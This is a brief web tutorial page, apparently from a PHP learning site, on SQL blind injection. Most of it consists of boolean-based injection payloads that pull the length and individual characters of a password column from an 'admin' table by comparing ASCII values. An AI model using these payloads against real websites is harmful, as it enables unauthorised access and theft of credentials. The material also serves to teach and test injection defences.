Home >Database >Mysql Tutorial >About sql blind injection syntax
If the page does not display wrong numbers, use blind injection syntax to determine the data content based on page changes
Get the data length:
and (select top 1 len(列名) from 表名)>5 and (select top 1 len(password) from admin)>16//错误 and (select top 1 len(password) from admin)>15//正常
Get the specified number of digits of data:
and (select top 1 asc(mid(列名,位置,1)) from 表名)>97 and (select top 1 asc(mid(admin,1,1)) from admin)>96//判断admin字段的内容第一位的ascii码值大于96 正常 and (select top 1 asc(mid(admin,1,1)) from admin)>97//判断admin字段的内容第一位的ascii码值大于97 错误 说明就是97
mid(字符串,截取的位置,截取字符数) asc() //将字符转换成ascii码 方便进行比较
Recommended: "mysql video tutorial"
The above is the detailed content of About sql blind injection syntax. For more information, please follow other related articles on the PHP Chinese website!